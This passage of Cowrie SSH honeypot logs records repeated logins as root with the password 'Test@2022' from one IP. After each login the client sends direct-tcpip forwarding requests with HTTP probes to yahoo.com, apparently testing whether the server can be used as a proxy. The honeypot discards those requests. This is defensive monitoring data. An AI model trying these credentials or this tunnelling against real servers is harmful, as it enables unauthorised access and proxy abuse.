{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.622416Z","src_ip":"213.209.150.239","session":"9c8473bf2e62"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.906045Z","src_ip":"213.209.150.239","session":"9c8473bf2e62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":12968,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12968","sensor":"my-vps","timestamp":"2025-08-26T00:57:02.964184Z","session":"9c8473bf2e62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.021411Z","src_ip":"213.209.150.239","session":"9c8473bf2e62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":16453,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16453","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.175123Z","session":"9c8473bf2e62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.233287Z","src_ip":"213.209.150.239","session":"9c8473bf2e62"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.290846Z","src_ip":"213.209.150.239","session":"9c8473bf2e62"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58762,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd667abdcb43","protocol":"ssh","message":"New connection: 213.209.150.239:58762 (1.2.3.4:22) [session: fd667abdcb43]","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.337002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.337723Z","src_ip":"213.209.150.239","session":"fd667abdcb43"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.385187Z","src_ip":"213.209.150.239","session":"fd667abdcb43"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.620427Z","src_ip":"213.209.150.239","session":"fd667abdcb43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":6534,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:6534","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.668582Z","session":"fd667abdcb43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.716486Z","src_ip":"213.209.150.239","session":"fd667abdcb43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":15885,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:15885","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.853524Z","session":"fd667abdcb43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.900970Z","src_ip":"213.209.150.239","session":"fd667abdcb43"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:03.951360Z","src_ip":"213.209.150.239","session":"fd667abdcb43"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58813,"dst_ip":"1.2.3.4","dst_port":22,"session":"f32555b34e68","protocol":"ssh","message":"New connection: 213.209.150.239:58813 (1.2.3.4:22) [session: f32555b34e68]","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.006986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.007855Z","src_ip":"213.209.150.239","session":"f32555b34e68"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.064878Z","src_ip":"213.209.150.239","session":"f32555b34e68"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.347339Z","src_ip":"213.209.150.239","session":"f32555b34e68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":8834,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:8834","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.405896Z","session":"f32555b34e68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.462388Z","src_ip":"213.209.150.239","session":"f32555b34e68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14422,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14422","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.618976Z","session":"f32555b34e68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.675481Z","src_ip":"213.209.150.239","session":"f32555b34e68"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.732590Z","src_ip":"213.209.150.239","session":"f32555b34e68"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58866,"dst_ip":"1.2.3.4","dst_port":22,"session":"f09b3d1fcb35","protocol":"ssh","message":"New connection: 213.209.150.239:58866 (1.2.3.4:22) [session: f09b3d1fcb35]","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.778963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.779593Z","src_ip":"213.209.150.239","session":"f09b3d1fcb35"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:04.826812Z","src_ip":"213.209.150.239","session":"f09b3d1fcb35"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.061845Z","src_ip":"213.209.150.239","session":"f09b3d1fcb35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":12477,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:12477","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.110347Z","session":"f09b3d1fcb35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.157515Z","src_ip":"213.209.150.239","session":"f09b3d1fcb35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15453,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15453","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.293690Z","session":"f09b3d1fcb35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.340808Z","src_ip":"213.209.150.239","session":"f09b3d1fcb35"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.389051Z","src_ip":"213.209.150.239","session":"f09b3d1fcb35"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58902,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bdc7ffc1f8b","protocol":"ssh","message":"New connection: 213.209.150.239:58902 (1.2.3.4:22) [session: 6bdc7ffc1f8b]","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.444728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.446017Z","src_ip":"213.209.150.239","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.502645Z","src_ip":"213.209.150.239","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.785619Z","src_ip":"213.209.150.239","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":21887,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:21887","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.843234Z","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:05.899984Z","src_ip":"213.209.150.239","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20682,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20682","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.055067Z","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.111921Z","src_ip":"213.209.150.239","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.169884Z","src_ip":"213.209.150.239","session":"6bdc7ffc1f8b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58963,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf5fca2f6430","protocol":"ssh","message":"New connection: 213.209.150.239:58963 (1.2.3.4:22) [session: bf5fca2f6430]","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.216065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:06.216984Z","src_ip":"213.209.150.239","session":"bf5fca2f6430"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"